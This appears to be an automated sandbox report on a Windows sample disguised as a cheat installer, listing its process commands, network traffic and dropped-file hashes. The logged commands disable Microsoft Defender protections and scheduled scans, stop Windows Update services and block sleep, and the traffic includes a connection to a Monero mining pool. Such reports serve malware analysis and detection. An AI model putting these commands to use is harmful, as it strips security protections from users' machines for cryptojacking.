"C:\Windows\Installer\MSI479A.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI47AA.tmp

"C:\Windows\Installer\MSI47AA.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI47BB.tmp

"C:\Windows\Installer\MSI47BB.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupFullScan 1 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableCatchupQuickScan 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning 1 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanAvgCPULoadFactor 5 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ServiceHealthReportInterval 0 -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -UnknownThreatDefaultAction 6 -Force"

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 218.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 195.177.78.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 60.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 63.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
GB 96.17.179.61:80 tcp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
GB 96.17.179.60:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.60:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js

MD5 7b33dd38c0c08bf185f5480efdf9ab90
SHA1 b3d9d61ad3ab1f87712280265df367eff502ef8b
SHA256 d1e41c11aa11e125105d14c95d05e1e1acd3bede89429d3a1c12a71450318f88
SHA512 22da641c396f9972b136d4a18eb0747747252cf7d5d89f619a928c5475d79375fbbe42d4e91821102e271ea144f89267ff307cd46494fdf7d6002ce9768b7bd9

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js

MD5 12148d2dff9ca3478e4467945663fa70
SHA1 50998482c521255af2760ed95bbdb1c4f7387212
SHA256 1fb82c82d847ebc4aa287f481ff67c8cc9bde03149987b2d43eb0dee2a5160b6
SHA512 f9f6a61af37d1924e3a9785aa04a33fa0107791d54cb07663c6ea8a68edfae3766682e914b6afaf198eb97c7f73ab53aa500b4661cdabdebd2576526664166f4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\license

MD5 d5f2a6dd0192dcc7c833e50bb9017337
SHA1 80674912e3033be358331910ba27d5812369c2fc
SHA256 5c932d88256b4ab958f64a856fa48e8bd1f55bc1d96b8149c65689e0c61789d3
SHA512 d1f336ff272bc6b96dc9a04a7d0ef8f02936dd594f514060340478ee575fe01d55fc7a174df5814a4faf72c8462b012998eca7bb898e3f9a3e87205fb9135af2

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@npmcli\query\LICENSE

MD5 c637d431ac5faadb34aff5fbd6985239
SHA1 0e28fd386ce58d4a8fcbf3561ddaacd630bc9181
SHA256 27d998b503b18cdb16c49e93da04069a99ba8a1d7e18d67146de8e242f9a6d21
SHA512 a4b744c1d494fcc55cd223c8b7b0ad53f3637aac05fe5c9a2be41c5f5e117610c75a323c7745dfeae0db4126f169c2b7b88649412b6044ba4a94e9a4d8d62535

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@npmcli\run-script\LICENSE

MD5 89966567781ee3dc29aeca2d18a59501
SHA1 a6d614386e4974eef58b014810f00d4ed1881575
SHA256 898c2bcff663681498ad1ca8235d45b6e70b10cdf1f869a5b5e69f6e46efedd3
SHA512 602dd09be2544542a46083e71a6e43fefc99eb884bdd705f629f8b4bf49192c6f8c482cd6a490397afde100be9347524079abb4c6d18bda3f64cf2fb77d2fe4c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@sigstore\sign\dist\types\fetch.js

MD5 8963201168a2449f79025884824955f2
SHA1 b66edae489b6e4147ce7e1ec65a107e297219771
SHA256 d43aa81f5bc89faa359e0f97c814ba25155591ff078fbb9bfd40f8c7c9683230
SHA512 7f65c6403a23d93fb148e8259b012d6552ab3bff178f4a7d6a9d9cec0f60429fc1899e39b4bca8cc08afc75d9a7c7bfdb13fc372ca63c85eb22b0355eb4d6000

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\@sigstore\sign\LICENSE

MD5 f03382535cd50de5e9294254cd26acba
SHA1 d3d4d2a95ecb3ad46be7910b056f936a20fefacf
SHA256 364a130d2ca340bd56eb1e6d045fc6929bb0f9d0aa018f2c1949b29517e1cdd0
SHA512 bbbbee42189d3427921409284615e31346bdbd970a6939bc1fe7f8eaed1903d9ad0534ddf7283347d406fa439d8559fbf95c6755ece82e684e456fce2b227016

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\ansi-styles\license

MD5 915042b5df33c31a6db2b37eadaa00e3
SHA1 5aaf48196ddd4d007a3067aa7f30303ca8e4b29c
SHA256 48da2f39e100d4085767e94966b43f4fa95ff6a0698fba57ed460914e35f94a0
SHA512 9c8b2def76ae5ffe4d636166bf9635d7abd69cdac4bf819a2145f7969646d39ae95c96364bc117f9fa544b98518c294233455d4f665af430c75d70798dd4ab13

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\cross-spawn\node_modules\which\LICENSE

MD5 82703a69f6d7411dde679954c2fd9dca
SHA1 bb408e929caeb1731945b2ba54bc337edb87cc66
SHA256 4ec3d4c66cd87f5c8d8ad911b10f99bf27cb00cdfcff82621956e379186b016b
SHA512 3fa748e59fb3af0c5293530844faa9606d9271836489d2c8013417779d10cc180187f5e670477f9ec77d341e0ef64eab7dcfb876c6390f027bc6f869a12d0f46

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\emoji-regex\LICENSE-MIT.txt

MD5 ee9bd8b835cfcd512dd644540dd96987
SHA1 d7384cd3ed0c9614f87dde0f86568017f369814c
SHA256 483acb265f182907d1caf6cff9c16c96f31325ed23792832cc5d8b12d5f88c8a
SHA512 7d6b44bb658625281b48194e5a3d3a07452bea1f256506dd16f7a21941ef3f0d259e1bcd0cc6202642bf1fd129bc187e6a3921d382d568d312bd83f3023979a0

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\inflight\LICENSE

MD5 90a3ca01a5efed8b813a81c6c8fa2e63
SHA1 515ec4469197395143dd4bfe9b1bc4e0d9b6b12a
SHA256 05dc4d785ac3a488676d3ed10e901b75ad89dafcc63f8e66610fd4a39cc5c7e8
SHA512 c9d6162bef9880a5ab6a5afe96f3ec1bd9dead758ca427f9ba2e8e9d9adaaf5649aad942f698f39b7a9a437984f8dc09141f3834cd78b03104f81ad908d15b31

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minimatch\dist\cjs\package.json

MD5 df9ffc6aa3f78a5491736d441c4258a8
SHA1 9d0d83ae5d399d96b36d228e614a575fc209d488
SHA256 8005a3491db7d92f36ac66369861589f9c47123d3a7c71e643fc2c06168cd45a
SHA512 6c58939da58f9b716293a8328f7a3649b6e242bf235fae00055a0cc79fb2788e4a99dfaa422e0cfadbe84e0d5e33b836f68627e6a409654877edc443b94d04c4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minimatch\dist\mjs\package.json

MD5 d0707362e90f00edd12435e9d3b9d71c
SHA1 50faeb965b15dfc6854cb1235b06dbb5e79148d2
SHA256 3ca9d4afd21425087cf31893b8f9f63c81b0b8408db5e343ca76e5f8aa26ab9a
SHA512 9d323420cc63c6bee79dcc5db5f0f18f6b8e073daaf8ffa5459e11f2de59a9f5e8c178d77fa92afc9ddd352623dec362c62fff859c71a2fab93f1e2172c4987f

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minipass\dist\commonjs\package.json

MD5 95b08bc3062cdc4b0334fa9be037e557
SHA1 a6e024bc66f013d9565542250aef50091391801d
SHA256 fa6944a20ca5e6fbaf98fd202eb8c7004d5b4ab786e36b9ed02ee31dbe196c9f
SHA512 65c66458abe2101032cdd1b50ca6e643e0c368d09dfa6cc7006b33ed815e106bb20f9aff118181807e7df9f5d4d8d9796709b1ec9a7e04544231636fdf8fdf42

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minipass\dist\esm\package.json

MD5 6138da8f9bd4f861c6157689d96b6d64
SHA1 ee2833a41c28830d75b2f3327075286c915ed0dd
SHA256 6dc1b06d6b093e9cccb20bee06a93836eee0420ae26803ca2ce4065d82f070d1
SHA512 0a3f1cb1522c6e7595186a9a54ed073ffa590b26c7d31b0877f19c925f847037e9f972066bfed62609b190eb2bc21ff7b31514e08c3de64780fef5982cbb21f2

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minipass-json-stream\node_modules\minipass\index.js

MD5 a8c344ac3d111b646df0dcae1f2bc3a3
SHA1 d8a136b49214e498da9c5a6e8cb9681b4fda3149
SHA256 dbc5220c4bc8b470da9c8e561b6a5382cf3fa9dcd97cace955ac6fd34a27970c
SHA512 523749e4d38585249f1e3d7cfb2cb23e7f76764b36d0a628f48ff6b50f0a08c8e8526a1236977da1bd4ac0ff0bd8d0ba9b834324f2bdef9bea9394dd6878c51d

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minipass-json-stream\node_modules\minipass\LICENSE

MD5 78e0c554693f15c5d2e74a90dfef3816
SHA1 58823ce936d14f068797501b1174d8ea9e51e9fe
SHA256 a5a110eb524bf3217958e405b5e3411277e915a2f5902c330348877000337e53
SHA512 b38ebcf2af28488dbf1d3aa6a40f41a8af4893ad6cb8629125e41b2d52c6d501283d882f750fc8323517c4eb3953d89fa0f3c8ceba2ae66a8bf95ae676474f09

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\minipass-json-stream\node_modules\minipass\package.json

MD5 1943a368b7d61cc3792a307ec725c808
SHA1 fc79b496665e2cdfc4bdaac9c7d7c4b2f4645f2c
SHA256 e99f6b67ba6e5cda438efb7a23dd399ee5c2070af69ce77720d95de5fb42921e
SHA512 7c05f03f5d3db01798c56c50d21628fc677097630aacf92e9ea47e70ff872d0e4e40217c1c2d5e81fc833ccf5afe9697f8f20a4772459b396aa5c85263289223

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\are-we-there-yet\LICENSE.md

MD5 1750b360daee1aa920366e344c1b0c57
SHA1 fe739dc1a14a033680b3a404df26e98cca0b3ccf
SHA256 7f75bb21103e77b7acfcf88a6ad0286741a18b5d13c4326160346e8cf7e356ad
SHA512 ff2486d589d32fb35aad9c02cd917ba1e738ca16b7ccc7954cdc4712a968fc5fc25612b489f962cbe8ddb2be40057cd1b59402aa9cade9b6479a1d0e1d7743a4

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\cacache\node_modules\brace-expansion\LICENSE

MD5 a5df515ef062cc3affd8c0ae59c059ec
SHA1 433c2b9c71bad0957f4831068c2f5d973cef98a9
SHA256 68f12f6e2c33688699249c01d8f9623c534da20aa71989c57b061b7bc1676d14
SHA512 0b0068b8beb6864dbb6971d9fe165d2d5fd420bcd6d7bbbd8f42589eb981bf95d854df2d16c21d378ea6d48f562345d2f66de0fd17134dffa8495eb496e6dff0

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\node-gyp\node_modules\minipass\LICENSE

MD5 5f114ac709a085d123e16c1e6363793f
SHA1 185c2ab72f55bf0a69f28b19ac3849c0ca0d9705
SHA256 833faa18ac4b83a6372c05b3643d0d44ecd27d6627b8cd19b0f48fe74260cf39
SHA512 cab00a78e63dec76fa124fc49d1c28962d674fa18dda5fdf2819078bd932f1bf0cc9abd741b78f62869b4809473099f85ba8a622bc96f4ee92cf11b564346597

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\npm-audit-report\LICENSE

MD5 5324d196a847002a5d476185a59cf238
SHA1 dfe418dc288edb0a4bb66af2ad88bd838c55e136
SHA256 720836c9bdad386485a492ab41fe08007ecf85ca278ddd8f9333494dcac4949d
SHA512 1b4187c58bebb6378f8a04300da6f4d1f12f6fbe9a1ab7ceda8a4752e263f282daebcac1379fa0675dd78ec86fffb127dba6469f303570b9f21860454df2203f

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\read-package-json-fast\LICENSE

MD5 ff53df3ad94e5c618e230ab49ce310fa
SHA1 a0296af210b0f3dc0016cb0ceee446ea4b2de70b
SHA256 ec361617c0473d39347b020eaa6dceedaebab43879fa1cd8b8f0f97a8e80a475
SHA512 876b0bd6a10f852661818d5048543bb37389887bf721016b6b7d1fa6d59d230d06f8ff68a59a59f03c25fbc80a2cbb210e7ca8179f111ecd10929b25b3d5cdfe

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\text-table\LICENSE

MD5 aea1cde69645f4b99be4ff7ca9abcce1
SHA1 b2e68ce937c1f851926f7e10280cc93221d4f53c
SHA256 435a6722c786b0a56fbe7387028f1d9d3f3a2d0fb615bb8fee118727c3f59b7b
SHA512 518113037ee03540caae63058a98525f9a4a67425bd8c3596f697bed5ae1d2053fe76f76b85a4eefb80cc519f7b03d368cf4b445288c4ca7cacb5e7523f33962

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\tuf-js\LICENSE

MD5 391090fcdb3d37fb9f9d1c1d0dc55912
SHA1 138f23e4cc3bb584d7633218bcc2a773a6bbea59
SHA256 564bcb001d6e131452a8e9fba0f0ccc59e8b881f84ce3e46e319a5a33e191e10
SHA512 070121c80cd92001196fb15efb152188c47fdc589b8f33b9da5881aa9470546b82cb8a8ea96fe1073723f47149e184f1a96c2777a9fc9b45af618c08464d6c5e

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\node_modules\wide-align\LICENSE

MD5 9d215c9223fbef14a4642cc450e7ed4b
SHA1 279f47bedbc7bb9520c5f26216b2323e8f0e728e
SHA256 0cef05dfff8b6aa7f35596984f5709f0d17c2582924a751efa471a76de7cdc11
SHA512 5e4ba806f279089d705e909e3c000674c4186d618d6ab381619099f8895af02979f3fc9abb43f78b9ffed33b90a7861f6c4b9d6c1bb47ed14a79e7f90eca833c

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe

MD5 d3bde299320b8e5ff11b9964d550e23d
SHA1 52818c911c23818f19c781486990a6c49d9ffdc7
SHA256 5678fd361de91297f9e0b39ad24361dd3c07020c8f4cd8da697ba4eab7e1d1a3
SHA512 a997ef0ef0fe2cd3859a4ae529cdc7df399087bb18524100ebeddc6ac3de7ee905ff0f5854db432447a5b9b3095d75d99c068d0e73408511913f7b8287a762b5

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe

MD5 9720d997c7f5a213fa5f44dede2e0fc8
SHA1 0f739e037f0c07b53f4375ac61b569af12827e1b
SHA256 3e89fcf54f63bc16265156a423ed137e79846f24f1c62c8bf487e723e16bf59b
SHA512 283b6ca450a2b2b2d6b68f0a8141780554bd70f503e66782f6be86e1441c056b324c2f1eb1edf25e970d52bd23a85e8c6b50cdb015c31c688839dad9b452b3eb

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 ac12413eaf8c1421c1165f0df544a15f
SHA1 c710ba67b4074447a414f7403d490f8885262315
SHA256 92fdffa7343b57c9aea85dcfac617933c39192ae33f74b5fc449ce929e63a9d3
SHA512 f5c1d03d20da535b08d891362519100441b5247e828ac11a931ad1f955543bd60f7259d3aa636b2be85efeb1db6b9a1621e9bb815b3e3eacc18c7bd300a6dc7f

C:\Users\Admin\AppData\Local\Temp\MSI92DB.tmp

MD5 c9c085c00bc24802f066e5412defcf50
SHA1 557f02469f3f236097d015327d7ca77260e2aecc
SHA256 a412b642de0e94db761ebd2834dde72eed86e65fc4a580670a300015b874ba24
SHA512 a6fa1f34cd630a7509a6441be7ad060de7e039967d2ec015e27c2a643b04e0eecf53902b7173c4c2e92e3a890bd7acb6a3307d9923838f0bfc71496fb184b1de

C:\Users\Admin\AppData\Local\Temp\MSI9425.tmp

MD5 6bb65410717bb2c62ed92cdbc9c41652
SHA1 1f0d56a24588c0c07e878f348df6bb0c3e4f693a
SHA256 91a6c5daebe89b7d9157188a2b3fa8e47d53b4d20c29bcc244635d1943397f7b
SHA512 1a864c6d010e3d62337a2067f53e82067ab01a556edee65036658bb7dd863bf22379d16aaf6385fda23060148c68c7225610058a153420e7b125c038285ceb38

C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi

MD5 2f87a9a96f3fa8afc10fdfb99c2d1a17
SHA1 75fc85f56ee48c28c87266a91cf2f36d33eae4cb
SHA256 da6c1618c72fe4c52a4c87b19fe5471f7dcf8ce4f41218eebb6b90b189d07a9a
SHA512 1b8ef3cb518ed31dd9d6560102363e5a364199a1822ef9551b5edbe4ee999593b830cec6c07c4412d185fdd46cadf9410cbbe581b4de8ccc69c5eba3937e0610

C:\Windows\Installer\MSI955A.tmp

MD5 b53fdfa925ce34d9bbbdce3a19c8e2a5
SHA1 8225a8b6ad24705d138741fb90a839941f475762
SHA256 9ae09e0c78d4a984f2fcaaadb092f0809eb35709f16ef722f653f77a96f5b0d9
SHA512 3a7dd8f42b9a5df6755c58c5171302b6563db860734408ac99dfbead83f08b5f1e1e2eb3d577a1d05346c31b2b464a8d565d949562a65641213090f19e7f5179

C:\Windows\Installer\MSI958B.tmp

MD5 fc73be92d63da62a5979fe6982978b44
SHA1 029d98062a7530c62acad48b584c06cbae393063
SHA256 ba51886c3df332e58b291f829fadabe54852cbcb3da60c16b78f433114baf3b6
SHA512 de5405ac670926f3fe3f2a94f867fd2d604eb32e315f761a58f69f6665d17b55960381b804950503dc5b87b26ccb0c9285e7f716539acab5fb81510d5d0053cb

C:\Windows\Installer\MSI959C.tmp

MD5 e8b80b09132235f0fe912570a3db652a
SHA1 51e30918be6b3601fd968072bee11e94b3e7169c
SHA256 de623b95deb1f840d00bb8ad6135600cb1140da8dd5c030673edf8c5603aac6b
SHA512 e9fac0214b540cc73b41139f35281f278d1aa44bffe9e267f44fdbef019b94fe633fb4e21fe84a1662d4f9515e8b6d55970157eb4367920f0dcec9cd8c913b01

C:\Windows\Installer\MSI95CD.tmp

MD5 71888b7d43ffbedabc83287585778497
SHA1 6070bffc8a3f778e011377f7f19c23f2e12988c4
SHA256 1f8dff9c9e6cc9b534e47fbddeec5bc6fc30d0dc7c0c3bf4edff9ba21a1f3cd5
SHA512 0ed04fa393278a4160d7f461ad1b8f33a8b437a12dcb660d5c980b1421a0281a23c03f42d7fd00d97861740ea8ca6c921217571057db75004346be3bab444179

C:\Windows\Installer\MSI95BC.tmp

MD5 c8633b8cb688dd46aa79a11561f862fa
SHA1 4ec241516e58369bd4390aaec1b3d8862d82571c
SHA256 a5ee658c5d4cb224f914f8ecffc24b84edb6316db284bf306cd44fceecd978b6
SHA512 eba3f277fe4834ddfeb8d4ce80608d4356a2c2932b7ae7ae7a0b5c8470e16a8c918b03019cbd48bb3e2a6584441873d6f8f14ba461d6fec75bd32c2f783b509c

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3us0jnrm.0uu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3476-3590-0x000001E2FE210000-0x000001E2FE232000-memory.dmp

memory/3476-3591-0x00007FFC1B8C0000-0x00007FFC1C381000-memory.dmp

memory/3476-3592-0x000001E298470000-0x000001E298480000-memory.dmp

memory/3476-3593-0x000001E298470000-0x000001E298480000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pss9667.ps1

MD5 a8a3a992fce81410c5771c10f743f6ba
SHA1 d0dd0c52514afa2150b250e549dfebf87758f191
SHA256 bd580ea3519d7b9c2bc34d30b66af13f580ee5beb1ce828499f607300dbd9bee
SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

C:\Users\Admin\AppData\Local\Temp\scr9656.txt

MD5 64d1817b6bfcd6cfda309f8910f51b57
SHA1 9faf2d4a707b789de6970b53b0dc80ac47ec3c52
SHA256 067838889a9eeb91ecb3fc155f3bfed21bd86d8c789d6485cca2a6d6a6bd4391
SHA512 d51ec763f8f2920782d958c84a5fb96d7e80382d88bc9a41ec0ca6e2570ebb328389ead37e4042c83d025a1e3580444f6374ffa015374d6c20c75f9ec85ba7ee

C:\Users\Admin\AppData\Local\Temp\scr9655.ps1

MD5 b4aaf8eaa1aa2477670ed54128e2c742
SHA1 b756fb677993bcf92916be8979052ed14a6170da
SHA256 5a4a897b8e922880f81b7ad94877acf3b394fffc1811d8826035b33d383624ba
SHA512 078503e1424578aa7a6791d1c962b801c1066958851d04ec4b8e24fc4ac5eecb4c013dc8484d04b5a5177a8bded08ba743f98ac69c656f7b79039fc8d1d7c55f

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 e458d9592f511e2e8729714a739e168b
SHA1 92101f399759087d75334bfba4d117f7182bd81f
SHA256 8153ff63aa470cec5fe210bdca977dc95e3cca78c18a8b9647630ae81912cc93
SHA512 fb1ebc62024e3f28d399ea79c379f1e04a81968e1b096e73d4ca0cdf8849e1380867d00c5f20f21c8f37024911325f45bfa25504180eedfbd68ee379ea3b44c2

C:\Users\Admin\AppData\Local\Temp\progressbad.bat

MD5 d3dff05f50e0edcecca77d97468a1aef
SHA1 87a217697bd981c8a9dc5a94ae65daf3ece5f081
